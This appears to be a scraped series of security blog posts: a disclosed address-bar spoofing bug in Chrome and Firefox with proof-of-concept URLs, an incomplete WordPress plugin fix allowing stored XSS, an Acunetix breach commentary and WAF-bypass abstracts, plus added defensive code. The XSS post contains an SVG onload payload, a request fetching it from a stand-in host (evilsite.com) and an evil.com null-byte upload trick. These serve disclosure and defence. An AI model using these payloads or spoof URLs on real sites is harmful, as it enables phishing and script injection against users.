Input validation flaws such as XSS are the most prevalent security threats affecting modern web applications. In order to mitigate these attacks, Web Application Firewalls (WAFs) are used, which inspect HTTP requests for malicious transactions. Nevertheless, they can be bypassed easily because of the complexity of JavaScript in modern browsers.
In this paper we discuss several techniques that can be used to circumvent WAFs, exemplified at XSS.<br />
<br />
The paper talks about the concepts of WAFs in general, identifying and fingerprinting WAFs, and various methodologies for constructing a bypass. It discusses well-known techniques such as brute forcing, regular-expression reversing and browser bugs for bypassing WAFs.<br />
<br />
<div style="text-align: center;">
<a href="http://sh3ifu.com/paper/" rel="nofollow" target="_blank"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgV_dW8i7-qY3gG2zxxRD_Qay71i4n-mM5t9PbKEN8F2_UyoA4q2PQfhaVtcj3lv9xRhVku-LMAInaO3yU_oOhUf4ZKvJFTiezer43_oIabolDIcQLpCQA8356pmVNV30B2cu_cw04CKVU/s320/Download-button.jpg" /></a></div>
</div>
Rafayhttp://www.blogger.com/profile/15944091083959815608noreply@blogger.com0tag:blogger.com,1999:blog-3121270199089759062.post-68325720217363870102016-08-15T23:16:00.000-07:002020-05-27T14:21:20.733-07:00Google Chrome, Firefox Address Bar Spoofing Vulnerability<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbPu9uoS7EympJLJxWchHqh_rd5K7Rd21KBhneHkffuSfvy66TiIivdemt4RHQirt5YK1VUwwrmcu-vSowmLI2qXYxdUzK7F9snIm5BiuDKwyuVGO-tF-NObuO6QpR_AT6ZqZ8jSb9JMU/s1600/security-tips-spoofing.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="258" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbPu9uoS7EympJLJxWchHqh_rd5K7Rd21KBhneHkffuSfvy66TiIivdemt4RHQirt5YK1VUwwrmcu-vSowmLI2qXYxdUzK7F9snIm5BiuDKwyuVGO-tF-NObuO6QpR_AT6ZqZ8jSb9JMU/s400/security-tips-spoofing.png" width="400" /></a></div>
<h2>
Introduction</h2>
</div>
Google's security team themselves <a href="https://www.google.com/about/appsecurity/reward-program/" rel="nofollow" target="_blank">state that </a>"<b>We recognize that the address bar is the only reliable security indicator in modern browsers</b>". If the only reliable security indicator can be controlled by an attacker, the consequences are severe: users can be tricked into supplying sensitive information to a malicious website, because an address bar that points to the expected domain leads them to believe they are visiting the legitimate site.
<br />
<a name='more'></a>In my paper "<b><a href="https://www.blackhat.com/docs/asia-16/materials/asia-16-Baloch-Bypassing-Browser-Security-Policies-For-Fun-And-Profit-wp.pdf" rel="nofollow" target="_blank">Bypassing Browser Security Policies For Fun And Profit</a></b>" I uncovered various address bar spoofing techniques as well as bugs affecting modern browsers. In this blog post I discuss yet another "<b>Address Bar Spoofing</b>" vulnerability, this one affecting Google Chrome's Omnibox. The Omnibox is Chrome's customized address bar, built for a better user experience with search suggestions, URL prediction, instant search and so on.<br />
<h2>
Technical Details</h2>
Characters from languages such as Arabic and Hebrew are displayed in RTL (Right To Left) order. Due to the mishandling of several Unicode characters such as <b>U+FE70</b>, <b>U+0622</b>, <b>U+0623</b> etc., and of how they are rendered in combination with the "first strong character" rule of the bidirectional algorithm, a URL can be displayed in a spoofed form.
It was noticed that placing a neutral character such as "/" together with an RTL letter such as "ا" in the file path causes the URL to be flipped and displayed from right to left. For the spoof to work the URL must begin with an IP address followed by those characters: the Omnibox treats an IP address as a combination of digits and punctuation, none of which is a strong directional character, and since the <b>LTR (Left To Right)</b> direction is not enforced on the string, the first strong character (the Arabic letter) makes the entire URL render <b>RTL (Right To Left)</b>. Strictly speaking it does not have to be an IP address; what matters is that the first strong (generally alphabetic) character in the displayed URL is an RTL character.<br />
<br />
<b><u>Logical Order</u></b><br />
<br />
The following is the logical order of the characters in memory. Note that the Omnibox strips "<b>http://</b>" and displays the string without that prefix.<br />
<br />
<b><span style="color: blue;">127.0.0.1</span>/ا/<span style="color: red;">http://</span><span style="color: red;">example.com</span></b><br />
<u><br /></u>
<b><u>Display Order</u></b><br />
<br />
The following is the display order of characters after the browser removes the leading "http://", decodes the percent-escaped bytes, and applies the bidirectional algorithm.<br />
<br />
<b><span style="color: red;">http://example.com</span>/ا/<span style="color: blue;">127.0.0.1</span></b><br />
<div>
<br /></div>
<b><u>Steps To Reproduce</u></b><br />
<b><br /></b>
<b>1) </b>Visit the following link in a vulnerable browser - <b><a href="http://182.176.65.7/%EF%B9%B0/http://google.com/test" rel="nofollow" target="_blank">http://182.176.65.7/%EF%B9%B0/http://google.com/test</a></b><br />
<br />
<b>2) </b>You will notice that the URL has been flipped from right to left and the browser displays <b>http://google.com/test/182.176.65.7</b> while it actually shows content served from the IP address.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiO_x-K1F4B8wWPjlqjbaq4eMwUgTTZ2UZ4754GaZcQOp_CnFdDkMzLtkOCWQghOWTHs1jJ1hCKg3roLyXjhv7EaziFw9VO-k4o5VJlYWYzipGCVNw5MaJfpgL9dEi4k_mxm1ISgiCmKQY/s1600/95d82072-54e4-46fd-8e91-dfe9dfe3cf6f.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="504" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiO_x-K1F4B8wWPjlqjbaq4eMwUgTTZ2UZ4754GaZcQOp_CnFdDkMzLtkOCWQghOWTHs1jJ1hCKg3roLyXjhv7EaziFw9VO-k4o5VJlYWYzipGCVNw5MaJfpgL9dEi4k_mxm1ISgiCmKQY/s640/95d82072-54e4-46fd-8e91-dfe9dfe3cf6f.png" width="640" /></a></div>
<div style="text-align: center;">
<br />
<br /></div>
The IP address part can easily be hidden, especially on mobile browsers, by using a long URL (<b>google.com/fakepath/fakepath/fakepath/... /127.0.0.1</b>) so that the IP is pushed out of view, which makes the attack look more realistic. A Unicode padlock character can also be inserted to suggest the presence of SSL.<br />
<h2>
Firefox Mobile Address Bar Spoofing CVE-2016-5267</h2>
Firefox was also prone to a similar vulnerability; however, it did not require an IP address to trigger. All it required was Arabic RTL characters, which in this case I provided through an Arabic IDN (<b>عربي.امارات</b>) in order to trigger the vulnerability, with the following result:<br />
<br />
<div>
<b>Proof of concept </b><br />
<b><br /></b>
<b><a href="http://xn--ngbrx4e.xn--mgbaam7a8h/google.com/test/test/test" rel="nofollow" target="_blank">http://عربي.امارات/google.com/test/test/test</a></b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_KVFCEVI0RUiDccV-ESZitO6eMlXn-a9TstmGHpT6fSvx_x99f3uzZb67gZxKkGrhifbULb2TtA2KpN4FrBb2lLkGRw2bFYNNvMk7LLdN8owVY-EGCIGcK8-eECD-UOe3Xp4g4czFw-I/s1600/test.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_KVFCEVI0RUiDccV-ESZitO6eMlXn-a9TstmGHpT6fSvx_x99f3uzZb67gZxKkGrhifbULb2TtA2KpN4FrBb2lLkGRw2bFYNNvMk7LLdN8owVY-EGCIGcK8-eECD-UOe3Xp4g4czFw-I/s640/test.png" width="640" /></a></div>
As you can see from the above screenshot, the page is hosted on <b><a href="http://xn--ngbrx4e.xn--mgbaam7a8h/" rel="nofollow" target="_blank">عربي.امارات</a></b>, however the address bar points to <b>google.com</b>.<br />
<b><br /></b>
<b><u>Important Note</u></b><br />
<b><br /></b>
A variation of this vulnerability has also been discovered in several other browsers that are still undergoing a fix, therefore I am refraining from disclosing them. Details will be disclosed once a fix has landed. </div>
<u style="font-weight: bold;"><br /></u>
<u style="font-weight: bold;">Fix</u><br />
<span style="font-weight: bold;"><br /></span>
<span style="font-weight: bold;">RFC 3987 § 4.1 states that "<b>Bidirectional IRIs MUST be rendered in the same way as they would be if they were in a left-to-right embedding.</b>", therefore setting the paragraph direction to LTR fixes this issue. </span>This is a known issue and has already been discussed in great detail <a href="https://bugs.chromium.org/p/chromium/issues/detail?id=495933" rel="nofollow" target="_blank">here</a>.<br />
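As an added illustration (not code from this post or from any browser vendor), the following JavaScript shows how a URL-rendering routine can apply the RFC 3987 § 4.1 rule on the display side: the displayed string is wrapped in an explicit left-to-right embedding and the host is shown in its ASCII (Punycode) form, so strong RTL characters such as the Arabic TLD above cannot reorder what the user sees. The names <code>renderUrlForDisplay</code> and <code>hasRtlOrBidiControls</code> are assumptions made for this example, and the sample URLs are constructed.

```javascript
// Added example (not from the post): render an untrusted URL for display
// following RFC 3987 section 4.1, so that right-to-left characters in the host
// or path cannot visually reorder the string the user sees.
// renderUrlForDisplay / hasRtlOrBidiControls are hypothetical names.

const LRE = "\u202A"; // LEFT-TO-RIGHT EMBEDDING
const PDF = "\u202C"; // POP DIRECTIONAL FORMATTING

// Strong RTL scripts (Hebrew, Arabic and related blocks, presentation forms)
// plus the explicit bidi control characters.
const RTL_OR_BIDI_CONTROL =
  /[\u0590-\u08FF\uFB1D-\uFDFF\uFE70-\uFEFF\u200E\u200F\u202A-\u202E\u2066-\u2069]/u;

function hasRtlOrBidiControls(s) {
  return RTL_OR_BIDI_CONTROL.test(s);
}

// Returns what a UI should show for `rawUrl`, or null if it does not parse.
function renderUrlForDisplay(rawUrl) {
  let url;
  try {
    url = new URL(rawUrl);
  } catch (e) {
    return null;
  }
  // The WHATWG URL parser applies IDNA ToASCII to the host and
  // percent-encodes non-ASCII path characters, so url.href is pure ASCII:
  // a host such as the Arabic TLD above is shown in its xn-- (Punycode)
  // form, and no RTL run survives to reorder the rendering.
  const ascii = url.href;
  return {
    origin: url.origin,                       // the part the user must trust
    text: LRE + ascii + PDF,                  // forced LTR embedding
    rtlInInput: hasRtlOrBidiControls(rawUrl), // lets the UI add a warning
  };
}

// Constructed samples: the PoC URL from this post and a plain ASCII one.
const samples = [
  "http://عربي.امارات/google.com/test/test/test",
  "https://example.com/path",
];
for (const s of samples) {
  const r = renderUrlForDisplay(s);
  console.log(r === null ? "unparsable" : r.origin, r && r.rtlInInput);
}
```

The embedding characters are what RFC 3987 names; a modern UI may prefer the isolate pair U+2066/U+2069, which additionally stops the URL from affecting surrounding text. Showing the Punycode host rather than the Unicode form is the conservative choice; browsers apply more refined script-mixing rules before deciding which to display.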
<b><u><br /></u></b>
<b><u>Credits</u></b><br />
<b><br /></b>
I am highly indebted to "<b>Matt Giuca</b>" from the Google Chrome team for his extensive help on this issue and to "<b>Tod Beardsley</b>" for handling the disclosure.<br />
<br /></div>
<b><u>Bug Bounty</u><b> </b></b><br />
<b><b><br /></b></b>
The total bounty rewarded for all bugs combined was $5000.
</div>
Rafayhttp://www.blogger.com/profile/15944091083959815608noreply@blogger.com0tag:blogger.com,1999:blog-3121270199089759062.post-65169161150501873002016-06-13T00:58:00.000-07:002020-05-27T14:24:13.634-07:00Wordpress Mobile Detector Incorrect Fix Leads To Stored XSS<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiB9zImlV09G0B-_SgO2pPpZlJjIh1AYltg4HtPQzOiLFEVxt-YG9k-QlbRjFjJhvjzVBbrDw-_vzzPwZ4O2en0lUw1cN00MagA2aXeVTyH5LICjJlzJC9RFXZEWsJyWlZGjNGf_YcawHs/s1600/wordpress.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiB9zImlV09G0B-_SgO2pPpZlJjIh1AYltg4HtPQzOiLFEVxt-YG9k-QlbRjFjJhvjzVBbrDw-_vzzPwZ4O2en0lUw1cN00MagA2aXeVTyH5LICjJlzJC9RFXZEWsJyWlZGjNGf_YcawHs/s400/wordpress.jpg" width="400" /></a></div>
<div>
<br /></div>
Recently, the WordPress Mobile Detector plugin was in the news for the "<b><a href="https://www.communications.gov.au/what-we-do/internet/stay-smart-online/alert-service/update-wordpress-mobile-detector-plugin-prevent-security-issues" rel="nofollow" target="_blank">Remote Code Execution</a></b>" vulnerability found inside the resize.php file. The vulnerability allowed an external attacker to upload arbitrary files to the server, as no validation was performed on the type of file retrieved from an external source.<br />
<div>
<br /></div>
<div>
Soon after the vulnerability became public, the plugin was taken down from the WordPress plugin directory until the issue was fixed. However, as per my analysis the fix is incomplete and leads to stored XSS. </div>
<div>
<a name='more'></a><div>
<h4>
The Vulnerability</h4>
</div>
<div>
<div>
Let's discuss the initial vulnerability first. The following PHP code takes input via the src parameter (GET or POST) and checks for the existence of the file. If it exists, the appropriate Content-Type header is set. </div>
<div>
<br /></div>
<div>
<u><b>Code</b></u></div>
<div>
<br /></div>
<div>
<?php</div>
<div>
if (isset($_REQUEST['src'])) { $path = dirname(__FILE__) . "/cache/" . basename($_REQUEST['src']);</div>
</div>
<div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>if(file_exists($path)){</div>
</div>
<div>
.</div>
<div>
.</div>
<div>
.</div>
<div>
.</div>
<div>
file_put_contents($path, file_get_contents($_REQUEST['src']));</div>
<div>
<b><u><br /></u></b></div>
<div>
?></div>
<div>
<br /></div>
<div>
It then uses the file_get_contents function to fetch the file contents from a URL and store them on the web host under the cache directory. Please note that this is only possible if allow_url_fopen is enabled on the server, which limits the effectiveness and impact of the exploit. The problem with the above code is that it does not check the fetched file's extension against a list of allowed extensions. So, if an attacker can fetch PHP (or ASPX) code, it results in code execution.</div>
<div>
<h4>
The (incomplete) Fix</h4>
</div>
</div>
<div>
The following fix was implemented, which defined a whitelist of acceptable extensions (primarily images). The code checks whether the requested file ends with one of the whitelisted extensions before it is fetched and stored. </div>
<div>
<br /></div>
<div>
<?php</div>
<div>
.</div>
<div>
.</div>
<div>
.</div>
<div>
.</div>
<div>
.</div>
<div>
<div>
$acceptable_extensions = [<b>'png','gif','jpg','jpeg','jif','jfif','<span style="color: red;">svg</span>'</b>];</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>$info = pathinfo($_REQUEST['src']);</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>// Check file extension</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>if(in_array($info['extension'],$acceptable_extensions)){</div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"> </span>file_put_contents($path, file_get_contents($_REQUEST['src']));</div>
<div>
<br /></div>
<div>
?></div>
</div>
<div>
<br /></div>
<div>
The problem with the above fix is that it whitelists the "<b>svg</b>" extension. It is widely known that SVG images can execute JavaScript. </div>
<div>
<b><u><br /></u></b></div>
<div>
<h4>
Using SVG To Trigger Stored XSS</h4>
</div>
<div>
In order to demonstrate the finding, the following SVG file is hosted on a remote server. </div>
<div>
<br /></div>
<div>
<b>test.svg</b></div>
<div>
<div>
<br /></div>
<div>
<b><?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><span style="color: red;"><svg onload="alert(1)"</span> xmlns="http://www.w3.org/2000/svg"><defs><font id="x"><font-face font-family="y"/></font></defs></svg></b></div>
</div>
<div>
<br /></div>
<div>
<div>
This image, once requested via the "<b>src</b>" parameter, will be saved to the cache directory:</div>
<div>
<b><br /></b></div>
<div>
<b>http://www.example.com/wp-content/plugins/wp-mobile-detector/resize.php?src=<span style="color: red;">evilsite.com/test.svg</span></b></div>
<div>
<br /></div>
<div>
Upon visiting the uploaded image: </div>
<div>
<br /></div>
<div>
<b>http://www.example.com/wp-content/plugins/wp-mobile-detector/cache/test.svg</b></div>
<div>
<br /></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZuXp_t3KZxjvgMZLv0A00PKbTc1GZv4a7YzqvPWhVHUJQhnekXZMQTv1ohejYoZnsZjC6In8wN5CofsKmnELiZEc-N2i1IsjhLh8Lrq6EMZs_15W5oyi0R4OG7XXzNWTXc5jutR-Q-Tc/s1600/redirection.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZuXp_t3KZxjvgMZLv0A00PKbTc1GZv4a7YzqvPWhVHUJQhnekXZMQTv1ohejYoZnsZjC6In8wN5CofsKmnELiZEc-N2i1IsjhLh8Lrq6EMZs_15W5oyi0R4OG7XXzNWTXc5jutR-Q-Tc/s640/redirection.png" width="640" /></a></div>
</div>
<div>
<h4>
Other Attack Possibilities</h4>
</div>
<div>
<b>i)</b> Where the path ends with an allowed extension there is an attack possibility - <b>victim.com/test.php/test.jpg</b>.</div>
<div>
<b><br /></b>
<b>ii)</b> In older versions of PHP, it was possible to append a null byte and trick the server into uploading a malicious PHP file. Example - <b>http://evil.com/malicious.php<span style="color: red;"></span>.svg</b></div>
<div>
<br /></div>
<div>
<b>iii)</b> If display_errors is set to true in the php.ini file, the file_get_contents() function can be utilized for Server Side Request Forgery. A similar issue was discovered by me in 2013; you can refer to the following blog post - <a href="http://www.rafayhackingarticles.net/2013/11/phpthumb-server-side-request-forgery.html" target="_blank"><b>phpThumb Server Side Request Forgery</b></a></div>
<div>
<br /></div>
<div>
<b>iv) </b>Even just allowing external users to fetch and upload images can introduce issues: someone could host pornographic images and tarnish the company's reputation, someone could deliberately upload a copyrighted image and sue the company, and since there is no limit to the number of images one can upload, one could attempt to exhaust server resources by uploading a large number of images. </div>
<div>
<div>
<h4>
<u>Suggested Fix For Vendor </u></h4>
<div>
<span style="font-weight: normal;">i) The suggested fix is to remove the "svg" extension from the whitelist:</span><br />
<br />
<b>$acceptable_extensions = ['png','gif','jpg','jpeg','jif','jfif'];</b><br />
<div>
</div>
</div>
<div>
<div style="font-weight: normal;">
<b><br /></b><b>ii) </b>File names should be rewritten after upload so that their location cannot be guessed, and directory listing should also be disabled. </div>
</div>
<div>
<br /></div>
<div>
<h4>
Suggested Fix For Webmasters</h4>
</div>
</div>
<div>
<b>iii)</b> Server administrators should modify the .htaccess file to only serve the allowed extensions and prevent access to other files.</div>
<div>
<br />
<b>iv)</b> The X-Content-Type-Options: nosniff header should be sent to prevent exploiting the site using, for example, a SWF file with a .jpg extension - <b><a href="https://github.com/nccgroup/CrossSiteContentHijacking" rel="nofollow" target="_blank">https://github.com/nccgroup/CrossSiteContentHijacking</a>.</b><br />
<b><br /></b>
<b>v) </b>The Content-Disposition header should be utilized.<br />
<b><br /></b>
Thanks to <b>Soroush Dalili</b> from NCC Group and <b>Daniel Cid</b> from Sucuri for the tip-off. </div>
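To show how the vendor-side and webmaster-side suggestions above fit together, here is an added PHP example of a hardened fetch-and-cache routine. It is not the plugin's code and not a patch the vendor shipped; the function names <code>fetch_remote_image()</code> and <code>serve_cached_image()</code>, the size limit and the cache layout are assumptions for illustration. It drops svg from the whitelist (i), stores files under random names (ii), and sends the nosniff and Content-Disposition headers when serving (iv, v); it also checks the downloaded bytes against the claimed extension, since a whitelist of extensions alone says nothing about the content.

```php
<?php
// Added example, not the plugin's code: a hardened version of the
// fetch-and-cache routine discussed above. fetch_remote_image(),
// serve_cached_image(), MAX_BYTES and the cache layout are assumptions.

// Allowed extensions WITHOUT svg (SVG is XML and may carry script), mapped to
// the MIME type the downloaded bytes must actually decode as.
const ALLOWED_TYPES = [
    'png'  => 'image/png',
    'gif'  => 'image/gif',
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
];

const MAX_BYTES = 2 * 1024 * 1024; // refuse oversized downloads

function fetch_remote_image(string $src, string $cache_dir): ?string
{
    // 1. Only plain http(s) URLs with a host: no file://, php://, data: etc.
    $parts = parse_url($src);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])
        || !in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    // 2. Extension check on the URL *path* only, lowercased, against the
    //    whitelist (the original fix looked at the whole "src" value).
    $ext = strtolower(pathinfo($parts['path'] ?? '', PATHINFO_EXTENSION));
    if (!isset(ALLOWED_TYPES[$ext])) {
        return null;
    }
    // 3. Download with a timeout, a size cap and no redirect following.
    $ctx  = stream_context_create(['http' => ['timeout' => 5, 'follow_location' => 0]]);
    $data = @file_get_contents($src, false, $ctx, 0, MAX_BYTES + 1);
    if ($data === false || strlen($data) > MAX_BYTES) {
        return null;
    }
    // 4. Verify the bytes really are the claimed image type: magic bytes via
    //    finfo, and the image decoder must agree.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->buffer($data);
    if ($mime !== ALLOWED_TYPES[$ext] || @getimagesizefromstring($data) === false) {
        return null;
    }
    // 5. Store under a random name so the cached path cannot be guessed.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($cache_dir, '/') . '/' . $name;
    if (file_put_contents($dest, $data, LOCK_EX) === false) {
        return null;
    }
    return $name;
}

// Serving side: never let the browser sniff the type or render inline.
function serve_cached_image(string $name, string $cache_dir): void
{
    // Accept only names of the exact shape produced above (no traversal).
    if (!preg_match('/^[0-9a-f]{32}\.(png|gif|jpe?g)$/', $name)) {
        http_response_code(404);
        return;
    }
    $path = rtrim($cache_dir, '/') . '/' . $name;
    if (!is_file($path)) {
        http_response_code(404);
        return;
    }
    $ext = pathinfo($name, PATHINFO_EXTENSION);
    header('Content-Type: ' . ALLOWED_TYPES[$ext]);
    header('X-Content-Type-Options: nosniff');
    header('Content-Disposition: attachment; filename="' . $name . '"');
    header('Content-Length: ' . filesize($path));
    readfile($path);
}

// Example use; in the real handler both values come from the request.
if (isset($_REQUEST['src'])) {
    $cache  = __DIR__ . '/cache';
    $stored = fetch_remote_image((string) $_REQUEST['src'], $cache);
    echo $stored === null ? 'rejected' : 'stored as ' . $stored;
}
```

The scheme check stops the wrapper tricks but not requests to internal hosts, so the SSRF concern in iii) still calls for a host allowlist or a check of the resolved address before fetching. Suggestion iii) (restricting which extensions the web server will serve from the cache directory, and blocking direct execution there) is a web-server configuration step and is not shown in the PHP above.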
</div>
</div>
Rafayhttp://www.blogger.com/profile/15944091083959815608noreply@blogger.com1tag:blogger.com,1999:blog-3121270199089759062.post-54517515189376058372016-06-05T01:35:00.000-07:002020-05-27T14:21:50.995-07:00Acunetix Website Hack And Lessons Learnt <div dir="ltr" style="text-align: left;" trbidi="on">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwrPT-4qTiPRfdYd-bmfMid8l6cjbhv1bE9hXDOKxVtSQcD8lMyteGFAGqmchb1pzo1wFNGEq5uKPz32HaUSknC8J1bG30vAdLx_usG6j_bKMV500nA4o4maIz7ox_KKGw4ncy9pCfmJY/s1600/Screenshot_2.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwrPT-4qTiPRfdYd-bmfMid8l6cjbhv1bE9hXDOKxVtSQcD8lMyteGFAGqmchb1pzo1wFNGEq5uKPz32HaUSknC8J1bG30vAdLx_usG6j_bKMV500nA4o4maIz7ox_KKGw4ncy9pCfmJY/s640/Screenshot_2.png" /></a><br />
<b><br /></b>
<b>Update: Acunetix has just released an official response about the incident, read it <a href="http://www.acunetix.com/official-statement-alleged-acunetix-website-defacement-incident/" rel="nofollow" target="_blank">here</a>.</b><br />
<b><br /></b>
Last night, the website of <a href="http://www.zone-h.org/mirror/id/26349487" rel="nofollow" target="_blank">Acunetix</a> (a well-known automated web application scanner) was hacked by Croatian hackers. Since then the website has been taken offline and the Acunetix team is reviewing the root cause of the hack. Currently the homepage displays a "403 Forbidden" error; this might be because either the attacker deleted all the files or the developers deliberately took it down in order to review the files for any backdoor that might have been injected.<br />
<br />
<div style="text-align: center;">
<i>Courtesy - http://exploitgate.com/acunetixs-website-got-hacked-croatian-hackers/</i></div>
<div style="text-align: center;">
<i></i></div>
<a name='more'></a><div style="text-align: center;">
<b><br /></b></div>
<h4>
Lessons Learnt </h4>
Up till now the cause of the hack remains unknown, as Acunetix is yet to acknowledge it. However, the hack teaches us the following generic lessons:<br />
<br />
<b>i) </b>Defense is more difficult than offense. For defense you have to find and close all 100 doors an attacker could use to get into the server; for offense the attacker has to find one single way in.<br />
<br />
<b>ii) </b>Web applications nowadays have become extremely complex, with new features being added on a daily basis. It's almost impossible to achieve complexity and security at the same time. <br />
<br />
<b>iii)</b> Automated scanners and Web Application Firewalls won't necessarily protect your web applications, as neither of them understands the business logic of the application. The defense-in-depth principle should be followed, where security is ensured at all layers. You can refer to my article "<a href="http://www.rafayhackingarticles.net/2015/12/secure-application-development-Modern-Defenses.html" target="_blank"><b>Secure Application Development And Modern Defenses</b></a>"<br />
<b><br /></b>
<b>iv) </b>Security is not a one-time job, it's an ongoing process; there is no fixed set of requirements that, once met, guarantees 100% security.<br />
<div>
<br /></div>
<div>
One of the arguments that people use is "<b>How can their tool ensure our web application's security when they cannot protect themselves from getting hacked?</b>". The answer is that absolutely nothing can ensure 100% security. We have seen many security products failing to ensure their own security; examples can be found <a href="http://imperva%20securesphere%20web%20application%20firewall%20mx%209.5.6%20-%20blind%20sql%20injection/" target="_blank">here</a> (<b>Imperva SecureSphere Web Application Firewall MX 9.5.6 - Blind SQL Injection</b>), <a href="http://www.infosecnews.org/so-who-hacked-ec-council-three-times-this-week/" rel="nofollow" target="_blank">here</a> (<b>So Who Hacked EC-Council Three Times This Week?</b>) and <b><a href="https://www.sophos.com/en-us/support/knowledgebase/118424.aspx" rel="nofollow" target="_blank">here</a> (Tavis Ormandy finds vulnerabilities in Sophos Anti-Virus products) </b>and it's perfectly normal.</div>
<div>
<br />
The problem comes when these product owners, instead of acknowledging and responding to the breach, choose to remain silent, thereby losing their credibility even further in the eyes of customers as well as the infosec community. Customers have the right to know whether their data was compromised in the breach, if so to what extent, and if passwords were compromised, how those passwords were being stored.<br />
<br />
With that being said, I would like to highlight the fact that they will not necessarily go out of business after this hack. EC-Council has been hacked multiple times and they are still in business. </div>
</div>
Rafayhttp://www.blogger.com/profile/15944091083959815608noreply@blogger.com0tag:blogger.com,1999:blog-3121270199089759062.post-65988598475968082222016-05-03T14:37:00.003-07:002020-05-27T14:28:46.211-07:00Bypassing Modern WAF's Exemplified At XSS (Webcast)<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<img height="366" src="https://media.licdn.com/mpr/mpr/AAEAAQAAAAAAAARMAAAAJGMxY2JjYTkwLTcwNGQtNGZhNS1iMTRjLWJhNzNhYmIzMmMyMQ.png" width="577" />
<br />
<br />
Past Saturday, I conducted a "<b>Webcast</b>" on "<b>Garage4hackers</b>" on one of my favorite subjects in the field of Information Security, i.e. "<b>WAF Bypass</b>". Initially, I had decided to present something on the topic of "<b><a href="http://www.rafayhackingarticles.net/2016/04/bypassing-browser-security-policies-for-Fun-And-Profit-Full-Video.html" target="_blank">Mobile Browser Security</a></b>", due to the fact that this is a topic I have recently been researching.<br />
<br />
However, I later realized that the "<b>TakeAways</b>" would not be very helpful, therefore I decided to talk about something that bug hunters/pentesters can use in their day-to-day pentests and security engagements, and hence I decided to present on this topic.<br />
<br />
I must admit that the response has been overwhelming; along with it, I have also managed to learn more from the feedback and CTF responses.<br />
<br />
I would like to specially thank "<b>Imdadullah</b>", "<b>Himanshu</b>", "<b>Sandeep</b>" along with other <b>garage4hackers</b> members for inviting/supporting me throughout the journey. One of the best things about the "<b>G4H Community</b>" is the work they are doing for the security community by conducting free-of-cost webcasts. You can find a list of other webcasts here - "<b><a href="http://www.garage4hackers.com/ranchoddas" rel="nofollow" target="_blank">http://www.garage4hackers.com/ranchoddas</a></b>/"<br />
<a name='more'></a><h4>
Abstract</h4>
</div>
It is known that over the years a trend has emerged in the information security landscape: web applications are under attack. Given this, Web Application Firewalls are becoming increasingly popular and are commonly used by organizations to protect against attacks such as SQL Injection, XSS, etc.<br />
<br />
While WAFs may help prevent application-layer attacks to some extent, they are certainly not replacements for input validation and secure coding practices, because they are based on blacklists, i.e. rejecting known patterns while allowing everything else. The problem, especially in the case of JavaScript, is that it is simply not possible to create blacklists capable of blocking all patterns without generating false positives, due to the dynamic nature of JavaScript and the infinite ways of obfuscating a payload.<br />
<br />
In this webinar, we will talk about various techniques that can be used to bypass WAFs, such as brute forcing, regular expression reversing and browser bugs. The webinar would mostly discuss<br />
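The abstract's point that a blacklist is no substitute for secure coding can be made concrete with a small added JavaScript example (written for this page, not material from the webcast or the CTF). It contrasts a signature-style rule list, which has to guess at the shape of an attack and rejects a harmless sentence as soon as it resembles one, with contextual output encoding, which neutralizes any input because it acts on the characters that change the HTML parse state rather than on patterns. The names <code>blacklistWaf</code>, <code>encodeForHtml</code> and <code>renderComment</code> and the sample strings are constructed for the example.

```javascript
// Added example (not from the webcast): why a blacklist rule set is not a
// replacement for output encoding. blacklistWaf(), encodeForHtml() and
// renderComment() are hypothetical names; the sample inputs are constructed.

// A typical signature-style rule list: reject input that "looks like" a
// script injection attempt.
const BLACKLIST = [/<script/i, /javascript:/i, /on\w+\s*=/i, /alert\s*\(/i];

function blacklistWaf(input) {
  return BLACKLIST.some((re) => re.test(input)) ? "blocked" : "allowed";
}

// Contextual output encoding for an HTML text node: every character that can
// change the parse state is encoded, so the shape of the input is irrelevant
// and no list of patterns is needed.
function encodeForHtml(s) {
  const map = {
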